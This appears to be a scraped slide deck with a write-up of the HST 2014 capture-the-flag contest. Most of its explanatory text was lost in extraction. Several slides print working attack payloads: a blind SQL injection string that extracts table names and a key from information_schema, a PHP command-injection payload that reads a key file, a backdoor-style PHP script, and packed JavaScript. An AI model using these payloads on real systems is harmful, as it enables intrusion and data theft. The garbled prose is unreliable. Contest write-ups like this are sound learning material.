Professional Documents
Culture Documents
HST 2014
HST 2014
1 / 16
S1_Hello_kiki: 100
hello_kiki.pcap .
RTP , -> VoIP Calls
, .
2 / 16
S2_qu3st2: 150
IDA .
base64 decode .
3 / 16
4 / 16
5 / 16
KEY IS A TCAN
md5(TCAN)
Key) 2ceb9b1a93b1b4ea9a57a117ddc3acfa
6 / 16
modify_ok.php
Blind SQL Injection .
sex=if((select substr(LPAD(bin(ascii(substr((SELECT table_name FROM information_schema.tables
WHERE table_type='base table' limit 1,1),$j,1))),8,0),$i,1)),1,2)
war_key , war_key .
war_key .
if((select substr(LPAD(bin(ascii(substr((SELECT war_key FROM war_key limit 0,1),$j,1))),8,0),$i,1)),1,2)
Key) President_of_HUST_is_Bother_Me
7 / 16
c NULL 21 xor .
8 / 16
S7_W T F: 350
a~z, A ~ Z input 'i' .
stringX gqSQUMGsmIeuiE .
9 / 16
0,1,2,3...,"Y",...)#
(is_admin "Y" ) , ,
<?=`cat ThisisKeyFile.php`?> .
10 / 16
<?php
/* --- */
$ip = "[****]";
$key = "[****]";
/*It's my door trick*/
$a=$_GET[a];
$b=$a;
if(is_array($a)){
$a= implode($a);
$x= substr($a,strlen($key));
}
if($key==substr($a,0,strlen($key))){
if(is_numeric(($b[count($b)]))){
$y = $ip."[****]";
$xx = $key.$x;
$r_key = [R**]($xx, $y);
}
}
$r_key=(base64_encode($r_key));
$r_key=str_replace('+','||',$r_key);
/* ---- */
if($_GET[glob_dir]){
print_r(glob("/var/www/html/".$_GET[glob_dir]));
11 / 16
}
?>
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharC
ode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return
r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new
RegExp('\\b'+e(c)+'\\b','g'),k[c]);return
p}('T(K(p,a,N,k,e,r){e=K(c){L(c<a?\'\':e(U(c/a)))+((c=c%a)>V?O.W(c+X):c.Y(Z))};M(!\'\'.P(/^/,O)){Q(c-)r[e(c)]=k[c]||e(c);k=[K(e){L
r[e]}];e=K(){L\'\\\\w+\'};c=1};Q(c--)M(k[c])p=p.P(R
10(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c]);L
3();2(8.3){c=1
p}(\'0="";0+="i";j="k";l=4;m
3();2(c.9){c.9(\\\'o/p\\\')}}q
5("s.6")}f(e){}}}2(!c){t(\\\'u
:(
2(8.5){d{c=1
y
z\\\');g
7(a,b){n
c=1
5("r.6")}f(e){d{c=1
A}c.B("C",a,h);c.D(E);g
h}0+="F";0+="G";0+="H";7("a.I?a="+J);\',S,S,\'11|R|M|12||13|14|15|16|17||||18||19|L|1a|1b|N|1c|1d|K|1
e|1f|1g|1h|1i|1j|1k|1l|1m|1n|1o|1p|1q|1r|1s|1t|1u|1v|1w|1x|1y|1z|1A\'.1B(\'|\'),0,{}))',62,100,'||||||||||||||||||||
||||||||||||||||||||||||||function|return|if|Cstar|String|replace|while|new|46|eval|parseInt|35|fromCharCode|29|t
oString|36|RegExp|key|XMLHttpRequest|ActiveXObject|XMLHTTP|makeRequest|window|overrideMim
eType|try|catch|true|0xde|alone|rc|var|text|xml|else|Msxml2|Microsoft|alert|Giving|up|Cannot|create|a
n|instance|false|open|GET|send|null|ad|be|ef|php|sc|split'.split('|'),0,{}))
eval(function(p,a,Cstar,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCh
arCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return
r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new
RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('0="";0+="i";j="k";l=4;m 7(a,b){n c=1 3();2(8.3){c=1
3();2(c.9){c.9(\'o/p\')}}q 2(8.5){d{c=1 5("r.6")}f(e){d{c=1 5("s.6")}f(e){}}}2(!c){t(\'u v :( w x y 6 z\');g
A}c.B("C",a,h);c.D(E);g
h}0+="F";0+="G";0+="H";7("a.I?a="+J);',46,46,'key|new|if|XMLHttpRequest||ActiveXObject|XMLHTTP|
makeRequest|window|overrideMimeType||||try||catch|return|true|0xde|Cstar|alone|rc|function|var|text|
xml|else|Msxml2|Microsoft|alert|Giving|up|Cannot|create|an|instance|false|open|GET|send|null|ad|be|e
f|php|sc'.split('|'),0,{}))
, function Cstar c .
12 / 16
key = "";
key += "0xde";
Cstar = "alone";
rc = 4;
function makeRequest(a, b) {
var c = new XMLHttpRequest();
if (window.XMLHttpRequest) {
c = new XMLHttpRequest();
if (c.overrideMimeType) {
c.overrideMimeType('text/xml')
}
} else if (window.ActiveXObject) {
try {
c = new ActiveXObject("Msxml2.XMLHTTP")
} catch (e) {
try {
c = new ActiveXObject("Microsoft.XMLHTTP")
} catch (e) {}
}
}
if (!c) {
alert('Giving up :( Cannot create an XMLHTTP instance');
return false
}
c.open("GET", a, true);
c.send(null);
return true
}
key += "ad";
key += "be";
key += "ef";
makeRequest("a.php?a=" + sc);
13 / 16
14 / 16
./bin -h a -d xxxxxx... (h )
/home/k1r.. PC
.
printf pc .
, execl printf
null , execl /bin/sh] \n .
/bin /tmp , tmp sh] \n .
15 / 16
Boss.smali
16 / 16